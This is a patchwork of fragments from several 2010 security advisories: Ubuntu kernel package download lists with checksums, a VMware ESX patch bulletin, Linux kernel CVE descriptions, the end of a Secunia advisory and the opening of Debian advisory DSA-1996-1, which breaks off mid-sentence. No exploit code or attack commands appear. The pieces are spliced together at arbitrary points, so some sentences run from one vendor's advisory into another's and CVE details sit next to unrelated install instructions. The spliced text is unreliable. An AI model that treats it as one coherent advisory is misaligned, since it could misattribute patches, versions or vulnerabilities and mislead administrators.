e1c923c22ea354ebe1cafd9e47487039\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb\n      Size/MD5:  4194402 9e1c101a413801d7210fc79c9747656f\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-20-lpia_2.6.31-20.58_lpia.deb\n      Size/MD5:   682746 1707bc343357d941df2a1e1c57d2a8df\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-20-lpia_2.6.31-20.58_lpia.deb\n      Size/MD5: 28871454 0d1213617a360a07b7a53abe3c0760de\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-20.58_lpia.deb\n      Size/MD5:   750880 814629a187330c6e6bf7dadb006965d4\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb\n      Size/MD5:   172924 1376cb1967806e5199a751f525666c99\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb\n      Size/MD5:   186134 fb41e2b9203fe7d14d6e98e5e7c68562\n    http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb\n      Size/MD5:    28366 9f7501b4e17447a38239fbb6b112cbc9\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb\n      Size/MD5:   292822 b4c34aeb5b831238afcb0b8457cf5d4c\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb\n      Size/MD5:  2400378 28c26c3677528c63b3e4f634064c7adf\n    http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb\n      Size/MD5:   141980 0d35996bf4010bd4371dab775948fba7\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb\n      Size/MD5:   189580 a4bb4c790773fb91475e981f2663cd1f\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb\n      Size/MD5:   148518 1a4fa321f231db6a4e3404a2a38e0cbc\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb\n      Size/MD5:    35298 aeb5bc12bc66e590ef7072ebae5a3973\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb\n      Size/MD5:     6834 a2a195736ce70dcde1f281485c080bb8\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb\n      Size/MD5:    86044 d64c249d1b6e1b1eca7801624bb15de8\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb\n      Size/MD5:    46420 9db6c9d9a0d710e662df3dca2a216bff\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb\n      Size/MD5:     8902 1e94fe84a6e0bc4cba06437c252ec011\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb\n      Size/MD5:    36274 b5bcb24682ff547578f211bb4aa01652\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb\n      Size/MD5:    21664 4e3797e267c5987c8e46cb0912a04e5b\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb\n      Size/MD5:  1495042 68f5e110d24e1495877583f6a3b6597d\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb\n      Size/MD5:    44074 fb9b87be10f0610dfd6b879aea95e870\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb\n      Size/MD5:    48536 5f365044da26f73038391d1209f60b53\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb\n      Size/MD5:   117794 f58f19685f85dc3550a10bdaeb2d9b87\n    http://ports.ubuntu.com/pool/main/l/linux/virtio-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb\n      Size/MD5:    14524 29c194a80a8fa54dfb397b8be6af72a2\n\n  powerpc architecture (Apple Macintosh G3/G4/G5):\n\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:   321490 558de8d97cc0767381e0093e8294583c\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:   263640 d52c67fff679c5b973dd4d97fc3e28f0\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:    58846 b5cf5f0bd3cf351dd95bc7f6eb58e9d7\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:    67044 3fb356582880d2f86b02ce922c5f5fb9\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:    45920 f0773734ad9d4fd2337f5469ff4a0e5a\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:    51302 70a0d50b29b644541b193f9e9c857a3c\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:    90708 a768fe740c47efd3d642910277753b47\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:   105156 35fac78125d8f94a33d7b6084be2f673\n    http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:    39492 5f4ccebd0c81fd5142c3938dee610caf\n    http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:    39270 5601042a79855cbff2c505f7ed8417a5\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:   581076 ce7fa0ad8c3053b00f2343ef41fd4bbf\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:   626394 e7e6bd8ff719c3862410795d1f1901b6\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:   149292 5675ca288225e5213df9e460b64f8515\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:   147336 cfb8fd9ece7e3251894da45a82c11605\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:    79772 3ee6beba647c74a5dc1d3c7941153057\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:    84140 b95ef8cd32392ff7466a7b15e8379cf2\n    http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:   402960 6e2f9e71205fd3353f128e355ff41925\n    http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:   342502 4e4b87ef9f0214b45404a83017940d23\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:  3824940 c1cc7ac46a8ddc565504345a061015cb\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:  5201026 48eebdc9c84f189419e48b5d101d1145\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-20-powerpc-smp_2.6.31-20.58_powerpc.deb\n      Size/MD5:   791908 cefb0e9e85e758d6c6b546859fcd58a9\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-20-powerpc64-smp_2.6.31-20.58_powerpc.deb\n      Size/MD5:   810434 1a8f7a142452d972b2e961dfb4997c04\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-20-powerpc_2.6.31-20.58_powerpc.deb\n      Size/MD5:   792076 874860d391556e090a66ea7f0dcdb4b4\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-20-powerpc-smp_2.6.31-20.58_powerpc.deb\n      Size/MD5: 24846578 9d769f07fbbeb74cee3866248036fb05\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-20-powerpc64-smp_2.6.31-20.58_powerpc.deb\n      Size/MD5: 25857670 2c1b3792233f39f9160ceb5ba6930c34\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-20-powerpc_2.6.31-20.58_powerpc.deb\n      Size/MD5: 24691624 f78d8b4e20f6c11f0f6053c561044c8f\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-20.58_powerpc.deb\n      Size/MD5:   735966 f3057a34c1a498913951d49a13cb806c\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:   272198 0680e125e6de2bc35a0dab39c7805cc2\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:   294756 c1d6f23df7b887740c399a756c4efc4e\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:   210578 1e98e81382f4129f30a6bbf0e8bb7623\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:   216994 05ae0a83f330ccf2a6e7d358a1f23ab2\n    http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:    25802 8c93c54e67028837b302ef7cc099ef06\n    http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:    28982 abd3ff105aa3b19518f321c0f3b9fed4\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:   315042 206c7818fe5d233c9df0c37b32629502\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:   357552 d2e17cb2aeadb7990ab03f9bb9d6171e\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:  2027740 309673629ecf011212bec5d4cacc7b3a\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:  2247556 8dd2fc751b12bc88d53d5275cbf0722d\n    http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:   213560 b7a270d6791f07d5c7911d95209ea072\n    http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:   209794 4a33fbd3ba03bd8f400bd71dd8ebf201\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:   210290 91cb97d1010a7a1bf65a7656c555f896\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:   244884 6e3b48544941fb912632ec3e72f75d46\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:   111842 c208f7829fe2331cb03590292a6519ef\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:   131602 a18cb667dc6a12fd78bb0f7616d753a2\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:    49026 27c6e4882dd3d7c88309267b676bab0d\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:    44084 aa8cc92a7839c15e0d11dbc558b00df2\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:     5860 973ec8be52bb9ed84b0c2b2d4b7cf1ec\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:     6500 13724a81b7c88d7188660d901988a03c\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:    79120 b5f689f7a6e387a0e079f9ec85cce40f\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:    85188 4b2a68fb103406ccb45c410d5381e34f\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:    74324 06ff1269118c456154d24d65946bce77\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:    27270 f454018bd3943dc71227ba46911d8490\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:     8540 d0c4f9b72ffb034342822bb68b8a86e0\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:     9814 18a524184d5a59ac1dab8152271f1c48\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:    58820 a451cf6138fcb51e4bd6fc1b0d38e06e\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:    70150 4410cc82862b61c69625878e363d2202\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:    23714 5d6be1d19d09c6cf5fed4ff3fa71714c\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:    30802 0893cea12a103e06cac5e6be389eb416\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:  1557456 52ec927aed080b2cdbcd398417fbf820\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:  1509412 93a274a2c3f3ffdbcfb40058149893ce\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:    81666 8b4f32d53470f76e606c36961bb8e90c\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:    88502 5e1810132e7959d4c5320b25ec82003e\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:    64566 c3421b045155b85f15bf4d64fd21afc1\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:    77180 0b0478d6a608d72b16d5317d384680ad\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:   141538 28182e02d3c347e9e6329e08b052a763\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb\n      Size/MD5:   151356 389d6b85f7f26ef1f532f31e62a27242\n\n  sparc architecture (Sun SPARC/UltraSPARC):\n\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb\n      Size/MD5:   139454 c579b8d6ed4aabfe2f9c2aa8f61cc5d1\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb\n      Size/MD5:    70116 10295069e8479b8071603b2b54fac9b3\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb\n      Size/MD5:    46518 28a9fd5ace498fa6068517c896494b1b\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb\n      Size/MD5:    93964 2d6930493105d7e756c8cd8887a5bf26\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb\n      Size/MD5:   588786 f34910fb0c827bf8107aa48d53281d93\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb\n      Size/MD5:   148426 f5b290c187ccb525119b4424da533845\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb\n      Size/MD5:    75854 4ffcd1d24140c3e3a6d0e8ea38eec9cc\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb\n      Size/MD5:  2901496 b7a5f516f35fb9ffacc08f66f60ae55e\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-20-sparc64-smp_2.6.31-20.58_sparc.deb\n      Size/MD5:   609758 127e1aa436326e294423d5b97bd17e5b\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-20-sparc64_2.6.31-20.58_sparc.deb\n      Size/MD5:   608336 33add8d3d34c4150a99ada3451ebc5ea\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-20-sparc64-smp_2.6.31-20.58_sparc.deb\n      Size/MD5: 20522824 3092f6b57534acee434e03637d131074\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-20-sparc64_2.6.31-20.58_sparc.deb\n      Size/MD5: 20228602 576c3449baa167c50ca15d8a5fd82c3b\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-20.58_sparc.deb\n      Size/MD5:   748058 2e2f636a0096e6773b2fdb0f85e87128\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb\n      Size/MD5:   266470 aeef718ea107a1ff17215f84e74e0439\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb\n      Size/MD5:   209178 89ae0797eee8cac103f260e026bb9c8e\n    http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb\n      Size/MD5:    26266 2f11bf7e5cbd2e46351eaccae55518aa\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb\n      Size/MD5:   314148 d5e30f9ee6d167788bbc783a31d793aa\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb\n      Size/MD5:  1675484 e2ba5dfb836a98b8b0e933fad76e41e2\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb\n      Size/MD5:   222876 ad0ed5d3850b8d9ce08169df088991d0\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb\n      Size/MD5:   121968 1df18a6dec07b226f1a891ea09dac292\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb\n      Size/MD5:    38792 f9bd63d6e511eb460acd5f61859cc924\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb\n      Size/MD5:   100816 79628331839d7a7d92d034d107b940d7\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb\n      Size/MD5:     8930 12af34035ddd9c01859ce9aeceb4756b\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb\n      Size/MD5:    62910 984b14287e02f3981f22a5d9e1bb1555\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb\n      Size/MD5:   120978 03ec3927627fdb5d4511bd6adf9f3c2b\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb\n      Size/MD5:  1218006 f14f558279cb37cf6906632354ff0b97\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb\n      Size/MD5:   101514 bd18d8241a9d61f5f3fd5f8c5f794764\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb\n      Size/MD5:   200332 27958836b007f739dad0e8763c809466\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb\n      Size/MD5:   185108 440058c6b48ac7e0d413dcba54e7af36\n\n. \n\n   ESXi 4.1\n   --------\n   ESXi410-201010401-SG\n   Download link: http://bit.ly/bb3xjV\n   md5sum: 05f1049c7a595481cd682e92fe8d3285\n   sha1sum: f6993c185f7d1cb971a4ae6e017e0246b8c25a76\n   http://kb.vmware.com/kb/1027753\n\n   ESX 4.1\n   -------\n   ESX410-201010001\n   Download link: http://bit.ly/a3Ffw8\n   md5sum: ff4435fd3c74764f064e047c6e5e7809\n   sha1sum: 322981f4dbb9e5913c8f38684369444ff7e265b3\n   http://kb.vmware.com/kb/1027027\n\n   ESX410-201010001 contains the following security bulletins:\n   ESX410-201010401-SG (COS kernel) | http://kb.vmware.com/kb/1027013\n   ESX410-201010419-SG (Likewise)   | http://kb.vmware.com/kb/1027026\n   ESX410-201010404-SG (NSS)        | http://kb.vmware.com/kb/1027016\n   ESX410-201010409-SG (tar)        | http://kb.vmware.com/kb/1027019\n   ESX410-201010412-SG (Perl)       | http://kb.vmware.com/kb/1027022\n   ESX410-201010413-SG (cpio)       | http://kb.vmware.com/kb/1027023\n   ESX410-201010410-SG (cURL)       | http://kb.vmware.com/kb/1027020\n   ESX410-201010401-SG (vmkernel64,\n                           VMX, CIM)| http://kb.vmware.com/kb/1027013\n   ESX410-201010414-SG\n             (vmware-esx-pam-config)| http://kb.vmware.com/kb/1027024\n   ESX410-201010402-SG (GnuTLS, NSS,\n                        and openSSL)| http://kb.vmware.com/kb/1027014\n\n   ESX410-201010001 also contains the following non-security bulletins\n   ESX410-201010405-BG ESX410-201010415-BG\n\n   To install an individual bulletin use esxupdate with the -b option. (CVE-2010-0415)\n \n drivers/net/e1000e/netdev.c in the e1000e driver in the Linux\n kernel 2.6.32.3 and earlier does not properly check the size of an\n Ethernet frame that exceeds the MTU, which allows remote attackers\n to have an unspecified impact via crafted packets, a related issue\n to CVE-2009-4537. (CVE-2010-0307)\n \n Aditionally, it was added support for some backlight models used in\n Samsung laptops and fixes to detect Saitek X52 joysticks.  The verification\n of md5 checksums and GPG signatures is performed automatically for you. executing a 64bit application with a missing ELF\ninterpreter out of a 32bit application and causing a segmentation\nfault. \n\nPROVIDED AND/OR DISCOVERED BY:\nMathias Krause\n\nORIGINAL ADVISORY:\nMathias Krause:\nhttp://marc.info/?l=linux-mm\u0026m=126466407724382\u0026w=4\n\nGIT commits:\nhttp://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=221af7f87b97431e3ee21ce4b0e77d5411cf1549\nhttp://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=05d43ed8a89c159ff641d472f970e3f1baa66318\nhttp://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=94673e968cbcce07fa78dac4b0ae05d24b5816e1\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n- ----------------------------------------------------------------------\nDebian Security Advisory DSA-1996-1                security@debian.org\nhttp://www.debian.org/security/                           dann frazier\nFebruary 12, 2010                   http://www.debian.org/security/faq\n- ----------------------------------------------------------------------\n\nPackage        : linux-2.6\nVulnerability  : privilege escalation/denial of service/sensitive memory leak\nProblem type   : local/remote\nDebian-specific: no\nCVE Id(s)      : CVE-2009-3939 CVE-2009-4027 CVE-2009-4536 CVE-2009-4538\n                 CVE-2010-0003 CVE-2010-0007 CVE-2010-0291 CVE-2010-0298\n                 CVE-2010-0306 CVE-2010-0307 CVE-2010-0309 CVE-2010-0410\n                 CVE-2010-0415\n                 \nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to a denial of service, sensitive memory leak or privilege\nescalation.  The Common Vulnerabilities and Exposures project\nidentifies the following problems:\n\nCVE-2009-3939\n\n    Joseph Malicki reported that the dbg_lvl sysfs attribute for the\n    megaraid_sas device driver had world-writable permissions,\n    permitting local users to modify logging settings. \n\nCVE-2009-4536 \u0026 CVE-2009-4538\n\n    Fabian Yamaguchi reported issues in the e1000 and e1000e drivers\n    for Intel gigabit network adapters which allow remote users to\n    bypass packet filters using specially crafted ethernet frames. \n    \nCVE-2010-0003\n\n    Andi Kleen reported a defect which allows local users to gain read\n    access to memory reachable by the kernel when the\n    print-fatal-signals option is enabled. This option is disabled by\n    default. \n\nCVE-2010-0007\n\n    Florian Westphal reported a lack of capability checking in the\n    ebtables netfilter subsystem. If the ebtables module is loaded,\n    local users can add and modify ebtables rules. \n\nCVE-2010-0291\n\n    Al Viro reported several issues with the mmap/mremap system calls\n    that allow local users to cause a denial of service (system panic)\n    or obtain elevated privileges. \n\nCVE-2010-0298 \u0026 CVE-2010-0306\n\n    Gleb Natapov discovered issues in the KVM subsystem where missing\n    permission checks (CPL/IOPL) permit a user in a guest system to\n    denial of service a guest (system crash) or gain escalated\n    privileges with the guest. \n\nCVE-2010-0309\n\n    Marcelo Tosatti fixed an issue in the PIT emulation code in the\n    KVM subsystem that allows privileged users in a guest domain to\n    cause a denial of service (crash) of the host system. \n\nCVE-2010-0410\n\n     Sebastian Krahmer discovered an issue in the netlink connector\n     subsystem that permits local users to allocate large amounts of\n     system memory resulting in a denial of service (out of memory). \n\nCVE-2010-0415\n\n    Ramon de Carvalho Valle discovered an issue in the sys_move_pages\n    